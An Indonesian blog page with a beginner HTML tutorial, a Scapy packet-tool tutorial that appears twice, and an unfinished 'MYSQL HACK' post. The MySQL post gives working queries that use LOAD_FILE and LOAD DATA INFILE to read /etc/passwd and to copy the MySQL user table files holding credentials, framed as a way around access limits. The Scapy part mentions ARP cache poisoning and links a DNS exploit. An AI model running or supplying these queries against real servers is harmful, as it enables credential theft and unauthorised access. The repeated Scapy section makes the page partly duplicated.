Ini merupakan artikel pertama yang
saya tulis di website saya ini. Karena
diwebsite ini saya akan membagi-
bagikan ilmu apa aja tentang
pembuatan website, maka kita
pelajari biangnya dulu, dasar dari
semua dasar pembuatan website
yaitu HTML.
HTML (Hypertext Markup Language)
merupakan bahasa yang digunakan
untuk membuat website.
Menggunakan tag untuk
mendeklarasikan sesuatu dan tag
tersebut tidak ditampilkan tetapi tag
tersebut memberi tahu browser
bagaimana cara menampilkan
dokumen website. Serta dapat
saling berhubungan dengan
dokumen HTML lain yang dikenal
dengan istilah link.
Suatu halaman website sebenarnya
hanya sebuah halaman teks, jika
anda menggunakan browser
internet explorer dan anda mengklik
view - source, maka anda dapat
melihat teks dari web tersebut.
Tetapi teks tersebut diterjemahkan
oleh browser menjadi halaman
website yang enak dilihat. Teks
merupakan bahasa universal bagi
komputer, yang berarti setiap
dokumen teks (termasuk website)
yang anda buat melalui Windows
dapat dibaca di sistem perasi lain
seperti Mac OS, Linux, Unix dan
lainnya.
HTML dan hal-hal yang berkaitan
dengan website distandarisasi oleh
sebuah badan yang disebut World
Wide Web Consortium (W3C).
Standard terbaru, konsep dan
proposal mengenai starndarisasi
web dapat dilihat di http://
www.w3.org. Standar untuk HTML
terbaru adalah HTML 4.0 yang telah
didukung oleh bermacam-macam
browser seperti Microsoft Internet
Explorer, Netscape Navigator,
Opera, Mozilla, Safari dan masih
banyak lagi. Browser
menterjemahkan t a g yang
terdapat pada dokumen HTML. Kita
akan segera membicarakan
mengenai tag.
Suatu halaman web merupakan file
teks yang berarti anda dapat
membuatnya hanya dengan
menggunakan notepad saja. Bahkan
jika anda masih pertama kali
mempelajari HTML, notepad
merupakan alat yang tepat. Saya
menyarankan untuk menggunakan
editplus karena menurut saya enak
aja dipakainya, tetapi anda bebas
menggunakan teks editor lain.
Jika anda baru pertama kali
mengenal HTML, hindari Program
WYSIWIG (What You See Is What
You Get) seperti Dreamweaver atau
Frontpage/Web Expression.
Program-program ini memang
memudahkan anda membuat
website tetapi anda akan kurang
memahami HTML, gunakan
Frontpage atau Dreamweaver
apabila anda sudah paham
mengenai HTML.
Sekarang buka saja notepad anda
dan kita mulai.
Kode HTML pertama
Buka notepad dan tuliskan kode
dibawah ini
H e l l o W o r l d
Simpan file tersebut dengan nama
hello.html didalam suatu folder
(misal c:\webku) dan buka file HTML
tersebut dengan browser kesukaan
anda. Hasilnya seperti ini:
Hello World!!
Oke jadi apa yang dimaksud oleh
"<" dan ">", ketika anda menuliskan
sesuatu diantara tanda "<" dan ">"
maka anda membuat sesuatu yang
disebut dengan tag, kalau anda lihat
dikamus bahasa inggris tag artinya
tanda/label. Sebagai contoh tag
< b > maksudnya untuk memulai
huruf tebal (bold) dan tag < / b >
merupakan tag penutup untuk
menghentikan huruf tebal.
Sebuah halaman HTML yang baik
harus memiliki tag < h e a d > dan
< b o d y > , tapi kita akan
membicarakan masalah ini
belakangan. Yang penting sekarang
pahami dulu mengenai tag HTML.
Sekarang akan kita pelajari lebih jauh
mengenai tag HTML.
Tag HTML dibagi menjadi dua, yaitu
tag HTML yang memiliki penutup
(containers) atau yang berdiri sendiri
(standalone).
Containers
Kebanyakan tag HTML adalah
containers (kita sebut containers saja
sebab sulit mencari terjemahannya
dalam bahasa Indonesia) yang
berarti tag tersebut memiliki
pembuka (batas awal) dan penutup
(batas akhir). Teks yang berada
diantara tag pembuka dan penutup
akan berubah sesuai dengan fungsi
dari tag tersebut. Perhatikan contoh
berikut:
H e l l o < i >W o r l d ! ! < / i > < b r >
Hasil:
Hello World!!
Tag berguna untuk
memiringkan teks (italic) tag
memiliki penutup yaitu . Tag
penutup selalu ditandai dengan "/".
Contoh diatas terdapat teks World!!
diantara tag pembuka dan tag
penutup sehingga
menghasilkan tulisan World!! yang
miring. Tag pembuka memiliki
atribut tetapi tag penutup tidak
memiliki atribut.
Standalone Tag
Beberapa tag tidak memerlukan
penutup sebab tag tersebut hanya
berfungsi untuk menempatkan
sebuah elemen pada halaman web.
Sebagai contoh tag < i m g > yang
merupakan tag untuk memasang
sebuah gambar didalam halaman
web. Tag lain yang tidak memiliki
penutup adalah < b r > yang
berguna untuk memberi jarak antar
teks dan tag < h r > untuk memberi
garis. Tag HTML cukup banyak
jumlahnya, anda dapat mencarinya
dibuku-buku atau mencarinya
melalui google untuk mengetahui
apa saja jenis tag HTML. Tapi saya
akan beritahu yangpenting-penting
saja.
Atribut
Atribut dipasang didalam tag
pembuka untuk menambahkan
fungsi dari tag tersebut. Setiap tag
memiliki beberapa atribut dan
dipasang sesudah nama tag dibatasi
oleh spasi. Urutan atribut tidak perlu
diperhatikan. Kebanyakan atribut
memiliki nilai yang dipanggil dengan
menggunakan tanda "=" sesudah
nama atribut. Bingung? coba kode
berikut ini dijamin anda mengerti:
H e l l o < f o n t f a c e = " v e r d a n a " s i z e = " 2 " c o l o r = " r e d " >W o r l d ! ! < / f o n t >
Hasilnya:
Hello World!!
Tulisan World!! terletak ditengah tag
< f o n t > nah tag < f o n t >
memiliki atribut face, size dan color
yang dapat anda ubah nilainya.
Cobalah untuk mengubah ukuran
(size) menjadi 3 atau jenis fontnya
ubahlah dari verdana menjadi arial.
Kira-kira seperti itu kegunaan atribut.
Bagaimana? lanjut?
HTML Entity
Jika anda ingin menuliskan karakter
khusus dalam web, maka anda
perlu menulisnya menggunakan
kode khusus. Kode khusus ini
dikenal dengan istilah HTML entity.
Sebagai contoh anda ingin menulis
seperti ini:
Saya belajar web
Anda lihat ada jarak spasi antara
belajar dan web. Anda tidak bisa
membuat spasi dengan menekan
tombol space bar berkali-kali.
Meskipun pada kode HTML hasilnya
terdapat jarak namun browser
hanya membacanya sekali, jadi
sebanyak apapun space bar yang
tekan browser hanya membacanya
satu spasi. Lalu bagaimana caranya?
Spasi dalam HTML memiliki kode
HTML entity yaitu & n b s p ; jadi
untuk membuat seperti contoh
diatas anda perlu menulisnya seperti
ini:
S a y a b e l a j a r & n b s p ; & n b s p ; & n b s p ; & n b s p ; we b
HTML entity selalu diawali dengan
"&" dan diakhiri dengan ";" ada
banyak sekali HTML entity anda
dapat mencarinya, dan lagi-lagi saya
akan menyuruh anda mencarinya
sendiri melalui google.
28 April 2010
27 April 2010
Obrak-abrik paket data dengan SCAPY
Scapy adalah suatu program yang dibuat menggunakan bahasa pemrograman python dan sangat
"powerfull" dalam berinteraksi untuk memanipulasi paket di jaringan.
Scapy mampu "membangun" danmemecah paket-paket dari berbagai jenis protokol yang ada, men-transimi-kannya, menangkapnya,
menerima permintaan dan menjawabnya, dan banyak lagi.
Scapy dapat digunakan untuk
menangani berbagai kegiatan yang berhubungan dengan jaringan, seperti kegiatan "scanning",
"tracerouting", "attack" atau "network discovery". Scapy bahkan
dapat mengajarkan kita semua proses-proses dari suatu protokol.
Scapy diciptakan oleh Philippe Biondi
dan versi terakhirnya dapat di unduh di http://hg.secdev.org/scapy/raw-file/tip/scapy.#Baiklah, bagi
yang telah mengunduh
programnya dapat langsung
menjalankannya dengan terlebih
dahulu menginstall python serta
berbagai library dan aplikasi lain
(tcpdump, gnuplot, pyx, crypt,
graphviz, imagemagick, visual)
yang dibutuhkannya telah terinstall
di komputer anda.
|--------------------------- | devil
scapy # ./scapy.py | Welcome to
Scapy (1.2.0.2) | >>>
|-------------------------- Atau untuk
para pengguna gentoo dapat
dengan melakukan installasi via
"port emerge"
|------------------------- | devil ~ #
emerge --search scapy |
Searching... | [ Results for search
key : scapy ] | [ Applications found :
1 ] | | * net-analyzer/scapy | Latest
version available: 1.1.1-r1 | Latest
version installed: [ Not Installed ] |
Size of files: 143 kB | Homepage:
http://www.secdev.org/projects/
scapy/ | Description: A Python
interactive packet manipulation
program for mastering the network
| License: GPL-2
|-------------------------- kemudian
dapat menginstallnya dengan
melakukan "emerge scapy", dan
untuk menjalankannya cukup
mengetikkan scapy dimanapun
|--------------------------- | devil ~ #
scapy | Welcome to Scapy (v1.1.1 /
f88d99910220) | >>>
|-------------------------- =======
Lingkungan ---| Hal pertama yang
dapat kita lakukan adalah dengan
mempelajari penggunaan scapy
tersebut baik dari berbagai
dokumentasi di internet atau secara
manual dengan membaca help()
yang ada. Salah satu perintah/fungsi
yang terpenting dari menggunakan
scapy adalah ls(), ls() akan
menampilkan informasi protokol
yang didukung oleh scapy.
|------------------------- | >>> ls() |
ARP : ARP | ASN1_Packet : None |
BOOTP : BOOTP | CookedLinux :
cooked linux | DHCP : DHCP options
| DNS : DNS | DNSQR : DNS
Question Record | DNSRR : DNS
Resource Record | Dot11 : 802.11 |
Dot11ATIM : 802.11 ATIM | ............
|------------------------- bahkan
dengan menggunakan perintah ls
(object) kita akan mendapatkan
informasi detil dari tiap protokol
yang didukung oleh scapy.
|--------------------------- | >>> ls
(ARP) | hwtype : XShortField = (1) |
ptype : XShortEnumField = (2048) |
hwlen : ByteField = (6) | plen :
ByteField = (4) | op : ShortEnumField
= (1) | hwsrc : ARPSourceMACField =
(None) | psrc : SourceIPField =
(None) | hwdst : MACField =
('00:00:00:00:00:00') | pdst : IPField
= ('0.0.0.0') |---------------------------
Sedangkan untuk melakukan list
semua perintah/fungsi yang
terdapat di Scapy dapat
menggunakan lsc()
|--------------------------- | lsc() |
>>> lsc() | sr : Send and receive
packets at layer 3 | sr1 : Send
packets at layer 3 and return only
the first answer | srp : Send and
receive packets at layer 2 | srp1 :
Send and receive packets at layer 2
and return only the first answer |
srloop : Send a packet at layer 3 in
loop and print the answer each time
| srploop : Send a packet at layer 2
in loop and print the answer each
time | sniff : Sniff packets | p0f :
Passive OS fingerprinting: which OS
emitted this TCP SYN ? |
arpcachepoison : Poison target's
cache with (your MAC,victim's IP)
couple | send : Send packets at layer
3 | sendp : Send packets at layer 2 |
traceroute : Instant TCP traceroute |
arping : Send ARP who-has
requests to determine which hosts
are up | ls : List available layers, or
infos on a given layer | lsc : List user
commands | queso : Queso OS
fingerprinting | nmap_fp : nmap
fingerprinting | ureport_ports :
portscan a target and output a
LaTeX table | dyndns_add : Send a
DNS add message to a nameserver
for "name" to have a new "rdata" |
dyndns_del : Send a DNS delete
message to a nameserver for
"name" | is_promisc : Try to guess if
target is in Promisc mode. The
target is provided by its ip. |
promiscping : Send ARP who-has
requests to determine which hosts
are in promiscuous mode
|------------------------------- Untuk
melihat detil tiap perintah/fungsi
tersebut pun cukup mudah, dengan
mempergunakan lsv() juga
|------------------------------- | >>>
lsc(sr) | Send and receive packets at
layer 3 | nofilter: put 1 to avoid use
of bpf filters | retry: if positive, how
many times to resend unanswered
packets | if negative, how many
times to retry when no more
packets are | answered | timeout:
how much time to wait after the last
packet has been sent | verbose: set
verbosity level | multi: whether to
accept multiple answers for the
same stimulus | filter: provide a BPF
filter | iface: listen answers only on
the given interface | | >>> lsc(ls) |
List available layers, or infos on a
given layer
======= Ujicoba ---| Baiklah,
mudah-mudahan setelah mengenal
beberapa hal tentang scapy, maka
sekarang kita akan mencoba
menggunakan scapy untuk
menggantikan berbagai peralatan
"hacking" dan jaringan yang sering
kita gunakan. -------- Mengganti
perintah/program Ping --- |
Sekarang kita akan mencoba menggantikan perintah/program
Ping yang biasanya kita lakukan
menggunakan scapy, untuk itu kita
akan memanfaatkan protokol ICMP()
dan IP() yang digunakan oleh program Ping
| >>>
ls(ICMP) | type : ByteEnumField = (8)
| code : ByteField = (0) | chksum :
XShortField = (None) | id :
XShortField = (0) | seq : XShortField
= (0) | >>> ls(IP) | version : BitField =
(4) | ihl : BitField = (None) | tos :
XByteField = (0) | len : ShortField =
(None) | id : ShortField = (1) | flags :
FlagsField = (0) | frag : BitField = (0) |
ttl : ByteField = (64) | proto :
ByteEnumField = (0) | chksum :
XShortField = (None) | src : Emph =
(None) | dst : Emph = ('127.0.0.1') |
options : IPoptionsField = ('')
|Setelah mengetahui detil mengenai tiap-tiap
bagian dari protokol tersebut, maka
saatnya kita akan mencoba menggantikan perintah Ping
tersebut menggunakan Scapy.
|------------------------- | devil scapy
# ./scapy.py | Welcome to Scapy
(1.2.0.2) | >>> ip=IP() | >>>
icmp=ICMP() | >>>
ip.dst="192.168.1.133" | >>> sr1(ip/
icmp) | Begin emission: | .Finished
to send 1 packets. | * | Received 2
packets, got 1 answers, remaining 0
packets |
ttl=64 proto=icmp |
chksum=0xf684 src=192.168.1.133
dst=192.168.1.101 options='' |
chksum=0xffff id=0x0 seq=0x0 |
Untuk memastikannya, kita dapat
menjalankan tcpdump
|devil ~ #
tcpdump -vv 'icmp[icmptype] =
icmp-echo' | tcpdump: WARNING:
eth0: no IPv4 address assigned |
tcpdump: listening on eth0, link-type
EN10MB (Ethernet), capture size 96
bytes | 22:04:33.716319 IP (tos 0x0,
ttl 64, id 1, offset 0, flags [none],
proto ICMP | (1), length 28)
192.168.1.101 > 192.168.1.133: ICMP
echo request, id 0, seq 0, | length 8
|Dan jika anda
tidak percaya bahwa kegiatan yang
dilakukan adalah sama dengan
melakukan 1 kali ping, maka silahkan
anda bandingkan hasilnya dengan
hasil program Ping,
| devil ~ #
ping 192.168.1.133 | PING
192.168.1.133 (192.168.1.133) 56(84)
bytes of data. | 64 bytes from
192.168.1.133: icmp_seq=1 ttl=64
time=2.30 ms | | devil ~ # tcpdump
-vv 'icmp[icmptype] = icmp-echo' |
tcpdump: listening on eth0, link-type
EN10MB (Ethernet), capture size 96
bytes | 22:07:06.571457 IP (tos 0x0,
ttl 64, id 0, offset 0, flags [DF], proto
ICMP | (1), length 84) 192.168.1.101 >
192.168.1.133: ICMP echo request, id
9804, seq | 1, length 64
|semuanya
adalah sama, kecuali berapa
settingan ICMP() yang kita biarkan
default sehingga berbeda, apakah
mungkin kita bisa mengelabui p0f ?
(dengan memainkan settingan
sequence, id, dsb) Atau bisa saja
dengan 1 baris perintah untuk
menggantikan program Ping.
|------------------------- | >>> sr1(IP
(dst="192.168.1.133")/ICMP()) | Begin
emission: | .Finished to send 1
packets. | * | Received 2 packets,
got 1 answers, remaining 0 packets
|
proto=icmp | chksum=0xf654
src=192.168.1.133 dst=192.168.1.101
options='' |
seq=0x0 |
ya..ya..ya, cuma bermain dengan
"style" :) Sekarang, sebagai
pelengkap kita bisa melihat detil
variabel yang terlibat dengan semua
yang kita lakukan sebelumnya
|---------------------- | >>> ls(ip) |
version : BitField = 4 (4) | ihl : BitField
= None (None) | tos : XByteField = 0
(0) | len : ShortField = None (None) |
id : ShortField = 1 (1) | flags :
FlagsField = 0 (0) | frag : BitField = 0
(0) | ttl : ByteField = 64 (64) | proto :
ByteEnumField = 0 (0) | chksum :
XShortField = None (None) | src :
Emph = '192.168.1.101' (None) | dst :
Emph = '192.168.1.133' ('127.0.0.1') |
options : IPoptionsField = '' ('') | >>>
ls(icmp) | type : ByteEnumField = 8
(8) | code : ByteField = 0 (0) |
chksum : XShortField = None (None)
| id : XShortField = 0 (0) | seq :
XShortField = 0 (0) | >>>
|----------------------- Yupe,
sekarang mudah-mudahan semua
makin jelas. ======= Menulis kode
---| Ya, kita sekarang akan menulis
kode yang tadi kita ketikkan kedalam
sebuah program berbasiskan
python dan menggunakan scapy
sebagai module dari program kita.
----- scping.py -----------------------
#!/usr/bin/env python import sys
from scapy import * if len
(sys.argv) != 2: print "Usage: ./
scping.py" sys.exit(1)
target=sys.argv[1] p=IP(dst=target)/
ICMP() sr1(p) ----- scping.py
ujicobakan |
devil scapy # ./scping.py | Usage: ./
scping.py | devil scapy # ./
scping.py 192.168.1.133 | Begin
emission: | .Finished to send 1
packets. | * | Received 2 packets,
got 1 answers, remaining 0 packets
| devil scapy # ./scping.py
192.168.1.135 <--- gagal | WARNING:
Mac address to reach 192.168.1.135
not found |----------------------
Karena kita belum mendefinisikan
berbagai jenis error dan kondisi
lainnya, maka wajar jika hal ini
terjadi, silahkan anda berkreasi
dengan program buatan anda :)
Silahkan anda bermain main dengan
protokol lainnya TCP(), UDP(), atau
DNS() :P ======= Real life Exploit
---| Tau tentang celah DNS baru-
baru ini yang sangat
menghebohkan dunia per-internet-
an? Tebak saja, versi scapy-nya pun
telah dirilis [3] ======= Penutup ---|
Selain berbagai kelebihannya, scapy
juga diakui memiliki beberapa
kelemahan, kemampuannya baru di
klaim 85% bisa menyamai NMAP,
selain itu juga scappy relatif lebih
lambat dalam bererapa hal, tetapi
tidak untuk belajar, terutama belajar
membuat exsploit. Python
memberikan kemudahan dalam
membuat program, dan Scapy
melengkapinya :), tulisan inipun
sengaja hanya untuk
memperkenalkan teman-teman
semua kepada scapy, dengan
harapan dapat bermain lebih kreatif
lagi dengan Scapy. Semoga,
petunjuk yang sedikit dari saya yang hanya memiliki sedikit ilmu ini dapat bermanfaat, amin.
Referensi ---| [1] Scapy help [2]
https://www.secdev.org/projects/
scapy/ [3] http://
www.milw0rm.com/exploits/6123
"powerfull" dalam berinteraksi untuk memanipulasi paket di jaringan.
Scapy mampu "membangun" danmemecah paket-paket dari berbagai jenis protokol yang ada, men-transimi-kannya, menangkapnya,
menerima permintaan dan menjawabnya, dan banyak lagi.
Scapy dapat digunakan untuk
menangani berbagai kegiatan yang berhubungan dengan jaringan, seperti kegiatan "scanning",
"tracerouting", "attack" atau "network discovery". Scapy bahkan
dapat mengajarkan kita semua proses-proses dari suatu protokol.
Scapy diciptakan oleh Philippe Biondi
dan versi terakhirnya dapat di unduh di http://hg.secdev.org/scapy/raw-file/tip/scapy.#Baiklah, bagi
yang telah mengunduh
programnya dapat langsung
menjalankannya dengan terlebih
dahulu menginstall python serta
berbagai library dan aplikasi lain
(tcpdump, gnuplot, pyx, crypt,
graphviz, imagemagick, visual)
yang dibutuhkannya telah terinstall
di komputer anda.
|--------------------------- | devil
scapy # ./scapy.py | Welcome to
Scapy (1.2.0.2) | >>>
|-------------------------- Atau untuk
para pengguna gentoo dapat
dengan melakukan installasi via
"port emerge"
|------------------------- | devil ~ #
emerge --search scapy |
Searching... | [ Results for search
key : scapy ] | [ Applications found :
1 ] | | * net-analyzer/scapy | Latest
version available: 1.1.1-r1 | Latest
version installed: [ Not Installed ] |
Size of files: 143 kB | Homepage:
http://www.secdev.org/projects/
scapy/ | Description: A Python
interactive packet manipulation
program for mastering the network
| License: GPL-2
|-------------------------- kemudian
dapat menginstallnya dengan
melakukan "emerge scapy", dan
untuk menjalankannya cukup
mengetikkan scapy dimanapun
|--------------------------- | devil ~ #
scapy | Welcome to Scapy (v1.1.1 /
f88d99910220) | >>>
|-------------------------- =======
Lingkungan ---| Hal pertama yang
dapat kita lakukan adalah dengan
mempelajari penggunaan scapy
tersebut baik dari berbagai
dokumentasi di internet atau secara
manual dengan membaca help()
yang ada. Salah satu perintah/fungsi
yang terpenting dari menggunakan
scapy adalah ls(), ls() akan
menampilkan informasi protokol
yang didukung oleh scapy.
|------------------------- | >>> ls() |
ARP : ARP | ASN1_Packet : None |
BOOTP : BOOTP | CookedLinux :
cooked linux | DHCP : DHCP options
| DNS : DNS | DNSQR : DNS
Question Record | DNSRR : DNS
Resource Record | Dot11 : 802.11 |
Dot11ATIM : 802.11 ATIM | ............
|------------------------- bahkan
dengan menggunakan perintah ls
(object) kita akan mendapatkan
informasi detil dari tiap protokol
yang didukung oleh scapy.
|--------------------------- | >>> ls
(ARP) | hwtype : XShortField = (1) |
ptype : XShortEnumField = (2048) |
hwlen : ByteField = (6) | plen :
ByteField = (4) | op : ShortEnumField
= (1) | hwsrc : ARPSourceMACField =
(None) | psrc : SourceIPField =
(None) | hwdst : MACField =
('00:00:00:00:00:00') | pdst : IPField
= ('0.0.0.0') |---------------------------
Sedangkan untuk melakukan list
semua perintah/fungsi yang
terdapat di Scapy dapat
menggunakan lsc()
|--------------------------- | lsc() |
>>> lsc() | sr : Send and receive
packets at layer 3 | sr1 : Send
packets at layer 3 and return only
the first answer | srp : Send and
receive packets at layer 2 | srp1 :
Send and receive packets at layer 2
and return only the first answer |
srloop : Send a packet at layer 3 in
loop and print the answer each time
| srploop : Send a packet at layer 2
in loop and print the answer each
time | sniff : Sniff packets | p0f :
Passive OS fingerprinting: which OS
emitted this TCP SYN ? |
arpcachepoison : Poison target's
cache with (your MAC,victim's IP)
couple | send : Send packets at layer
3 | sendp : Send packets at layer 2 |
traceroute : Instant TCP traceroute |
arping : Send ARP who-has
requests to determine which hosts
are up | ls : List available layers, or
infos on a given layer | lsc : List user
commands | queso : Queso OS
fingerprinting | nmap_fp : nmap
fingerprinting | ureport_ports :
portscan a target and output a
LaTeX table | dyndns_add : Send a
DNS add message to a nameserver
for "name" to have a new "rdata" |
dyndns_del : Send a DNS delete
message to a nameserver for
"name" | is_promisc : Try to guess if
target is in Promisc mode. The
target is provided by its ip. |
promiscping : Send ARP who-has
requests to determine which hosts
are in promiscuous mode
|------------------------------- Untuk
melihat detil tiap perintah/fungsi
tersebut pun cukup mudah, dengan
mempergunakan lsv() juga
|------------------------------- | >>>
lsc(sr) | Send and receive packets at
layer 3 | nofilter: put 1 to avoid use
of bpf filters | retry: if positive, how
many times to resend unanswered
packets | if negative, how many
times to retry when no more
packets are | answered | timeout:
how much time to wait after the last
packet has been sent | verbose: set
verbosity level | multi: whether to
accept multiple answers for the
same stimulus | filter: provide a BPF
filter | iface: listen answers only on
the given interface | | >>> lsc(ls) |
List available layers, or infos on a
given layer
======= Ujicoba ---| Baiklah,
mudah-mudahan setelah mengenal
beberapa hal tentang scapy, maka
sekarang kita akan mencoba
menggunakan scapy untuk
menggantikan berbagai peralatan
"hacking" dan jaringan yang sering
kita gunakan. -------- Mengganti
perintah/program Ping --- |
Sekarang kita akan mencoba menggantikan perintah/program
Ping yang biasanya kita lakukan
menggunakan scapy, untuk itu kita
akan memanfaatkan protokol ICMP()
dan IP() yang digunakan oleh program Ping
| >>>
ls(ICMP) | type : ByteEnumField = (8)
| code : ByteField = (0) | chksum :
XShortField = (None) | id :
XShortField = (0) | seq : XShortField
= (0) | >>> ls(IP) | version : BitField =
(4) | ihl : BitField = (None) | tos :
XByteField = (0) | len : ShortField =
(None) | id : ShortField = (1) | flags :
FlagsField = (0) | frag : BitField = (0) |
ttl : ByteField = (64) | proto :
ByteEnumField = (0) | chksum :
XShortField = (None) | src : Emph =
(None) | dst : Emph = ('127.0.0.1') |
options : IPoptionsField = ('')
|Setelah mengetahui detil mengenai tiap-tiap
bagian dari protokol tersebut, maka
saatnya kita akan mencoba menggantikan perintah Ping
tersebut menggunakan Scapy.
|------------------------- | devil scapy
# ./scapy.py | Welcome to Scapy
(1.2.0.2) | >>> ip=IP() | >>>
icmp=ICMP() | >>>
ip.dst="192.168.1.133" | >>> sr1(ip/
icmp) | Begin emission: | .Finished
to send 1 packets. | * | Received 2
packets, got 1 answers, remaining 0
packets |
ttl=64 proto=icmp |
chksum=0xf684 src=192.168.1.133
dst=192.168.1.101 options='' |
chksum=0xffff id=0x0 seq=0x0 |
Untuk memastikannya, kita dapat
menjalankan tcpdump
|devil ~ #
tcpdump -vv 'icmp[icmptype] =
icmp-echo' | tcpdump: WARNING:
eth0: no IPv4 address assigned |
tcpdump: listening on eth0, link-type
EN10MB (Ethernet), capture size 96
bytes | 22:04:33.716319 IP (tos 0x0,
ttl 64, id 1, offset 0, flags [none],
proto ICMP | (1), length 28)
192.168.1.101 > 192.168.1.133: ICMP
echo request, id 0, seq 0, | length 8
|Dan jika anda
tidak percaya bahwa kegiatan yang
dilakukan adalah sama dengan
melakukan 1 kali ping, maka silahkan
anda bandingkan hasilnya dengan
hasil program Ping,
| devil ~ #
ping 192.168.1.133 | PING
192.168.1.133 (192.168.1.133) 56(84)
bytes of data. | 64 bytes from
192.168.1.133: icmp_seq=1 ttl=64
time=2.30 ms | | devil ~ # tcpdump
-vv 'icmp[icmptype] = icmp-echo' |
tcpdump: listening on eth0, link-type
EN10MB (Ethernet), capture size 96
bytes | 22:07:06.571457 IP (tos 0x0,
ttl 64, id 0, offset 0, flags [DF], proto
ICMP | (1), length 84) 192.168.1.101 >
192.168.1.133: ICMP echo request, id
9804, seq | 1, length 64
|semuanya
adalah sama, kecuali berapa
settingan ICMP() yang kita biarkan
default sehingga berbeda, apakah
mungkin kita bisa mengelabui p0f ?
(dengan memainkan settingan
sequence, id, dsb) Atau bisa saja
dengan 1 baris perintah untuk
menggantikan program Ping.
|------------------------- | >>> sr1(IP
(dst="192.168.1.133")/ICMP()) | Begin
emission: | .Finished to send 1
packets. | * | Received 2 packets,
got 1 answers, remaining 0 packets
|
proto=icmp | chksum=0xf654
src=192.168.1.133 dst=192.168.1.101
options='' |
seq=0x0 |
ya..ya..ya, cuma bermain dengan
"style" :) Sekarang, sebagai
pelengkap kita bisa melihat detil
variabel yang terlibat dengan semua
yang kita lakukan sebelumnya
|---------------------- | >>> ls(ip) |
version : BitField = 4 (4) | ihl : BitField
= None (None) | tos : XByteField = 0
(0) | len : ShortField = None (None) |
id : ShortField = 1 (1) | flags :
FlagsField = 0 (0) | frag : BitField = 0
(0) | ttl : ByteField = 64 (64) | proto :
ByteEnumField = 0 (0) | chksum :
XShortField = None (None) | src :
Emph = '192.168.1.101' (None) | dst :
Emph = '192.168.1.133' ('127.0.0.1') |
options : IPoptionsField = '' ('') | >>>
ls(icmp) | type : ByteEnumField = 8
(8) | code : ByteField = 0 (0) |
chksum : XShortField = None (None)
| id : XShortField = 0 (0) | seq :
XShortField = 0 (0) | >>>
|----------------------- Yupe,
sekarang mudah-mudahan semua
makin jelas. ======= Menulis kode
---| Ya, kita sekarang akan menulis
kode yang tadi kita ketikkan kedalam
sebuah program berbasiskan
python dan menggunakan scapy
sebagai module dari program kita.
----- scping.py -----------------------
#!/usr/bin/env python import sys
from scapy import * if len
(sys.argv) != 2: print "Usage: ./
scping.py
target=sys.argv[1] p=IP(dst=target)/
ICMP() sr1(p) ----- scping.py
ujicobakan |
devil scapy # ./scping.py | Usage: ./
scping.py
scping.py 192.168.1.133 | Begin
emission: | .Finished to send 1
packets. | * | Received 2 packets,
got 1 answers, remaining 0 packets
| devil scapy # ./scping.py
192.168.1.135 <--- gagal | WARNING:
Mac address to reach 192.168.1.135
not found |----------------------
Karena kita belum mendefinisikan
berbagai jenis error dan kondisi
lainnya, maka wajar jika hal ini
terjadi, silahkan anda berkreasi
dengan program buatan anda :)
Silahkan anda bermain main dengan
protokol lainnya TCP(), UDP(), atau
DNS() :P ======= Real life Exploit
---| Tau tentang celah DNS baru-
baru ini yang sangat
menghebohkan dunia per-internet-
an? Tebak saja, versi scapy-nya pun
telah dirilis [3] ======= Penutup ---|
Selain berbagai kelebihannya, scapy
juga diakui memiliki beberapa
kelemahan, kemampuannya baru di
klaim 85% bisa menyamai NMAP,
selain itu juga scappy relatif lebih
lambat dalam bererapa hal, tetapi
tidak untuk belajar, terutama belajar
membuat exsploit. Python
memberikan kemudahan dalam
membuat program, dan Scapy
melengkapinya :), tulisan inipun
sengaja hanya untuk
memperkenalkan teman-teman
semua kepada scapy, dengan
harapan dapat bermain lebih kreatif
lagi dengan Scapy. Semoga,
petunjuk yang sedikit dari saya yang hanya memiliki sedikit ilmu ini dapat bermanfaat, amin.
Referensi ---| [1] Scapy help [2]
https://www.secdev.org/projects/
scapy/ [3] http://
www.milw0rm.com/exploits/6123
MYSQL HACK
Pendahuluan Pada kesempatan
kali ini saya akan mencoba
mengajak anda menggunakan
MySQL menjadi sebuah tools
hacking menggunakan 2 fungsi
yang ada dalam MySQL. ---//
Keterangan & Contoh Penggunaan
LOAD_FILE() & LOAD DATA INFILE
Fungsi yang kita akan gunakan
adalah load_file() dan LOAD DATA
INFILE, berikut ini adalah
keterangannya - LOAD_FILE()
Dengan fungsi ini, kita dapat
membaca file-file yang terdapat
pada server MySQL tersebut dan
menampilkannya ke layar.
Contoh : //--- query ----// mysql>
SELECT LOAD_FILE('/etc/passwd');
atau mysql> SELECT LOAD_FILE('c:/
boot.ini'); //--- query ----// Maka
akan menampilkan isi dari file
passwd atau file boot.ini - LOAD
DATA INFILE Dengan fungsi ini, kita
dapat mengambil isi file dan
menaruhnya kedalam database;
Contoh : //--- query ----// mysql>
LOAD DATA INFILE '/etc/passwd'
INTO TABLE namatable; atau
mysql> LOAD DATA INFILE 'c:/
boot.ini' INTO TABLE
namatable; //--- query ----// Maka
perintah tersebut akan mengambil
isi file passwd atau file boot.ini dan
menaruhnya ke tabel namatable.
Dengan fungsi-fungsi
tersebut,kemungkinan kita juga
dapat mengambil file-file database
(.MYI,.frm,.MYD) dari server
tersebut selama file-file tersebut
BISA DIBACA OLEH SEMUA USER.
---// Mengapa mengambil file-file
tersebut ? Sebenarnya anda bisa
saja mengambil file-file yang lain,
tetapi jika user mysql anda tidak
diizinkan untuk mengakses database
mysql, anda dapat menggunakan
langkah-langkah ini. Contoh : Misal :
- Sistem operasi target adalah
Windows - Direktori MySQL ada di
C:\MySQL Langkah yang kita lakukan
sebelumnya adalah mencoba untuk
membuat - Database dengan nama
db_dudulz - Tabel dengan nama
tbl_dudulz yang memiliki field
fl_namafile dengan tipe data varchar
dan field fl_content dengan tipe data
longblob; //--- query ----// mysql>
create database db_dudulz; mysql>
use db_dudulz; mysql> create table
tbl_dudulz (fl_namafile varchar
(20),fl_content longblob); //--- query
----// Setelah itu kita akan
mengambil isi file .MYI,.frm,.MYD
dari direktori C:\MySQL\data\mysql
\, dalam hal ini kita hanya
mengambil file table user yakni file
user.frm, user.MYI, user.MYD . //---
query ----// mysql> insert into
tbl_dudulz values ('user.frm',load_file
('c:\\MySQL\\data\\mysql\
\user.frm')); mysql> insert into
tbl_dudulz values ('user.MYI',load_file
('c:\\MySQL\\data\\mysql\
\user.MYI')); mysql> insert into
tbl_dudulz values
('user.MYD',load_file('c:\\MySQL\
\data\\mysql\\user.MYD')); //---
query ----// ---// Ambil Isi File
Setelah berhasil memasukkan isi dari
file-file tersebut anda dapat
mengambil isi file tersebut dari
database db_dudulz tadi dan
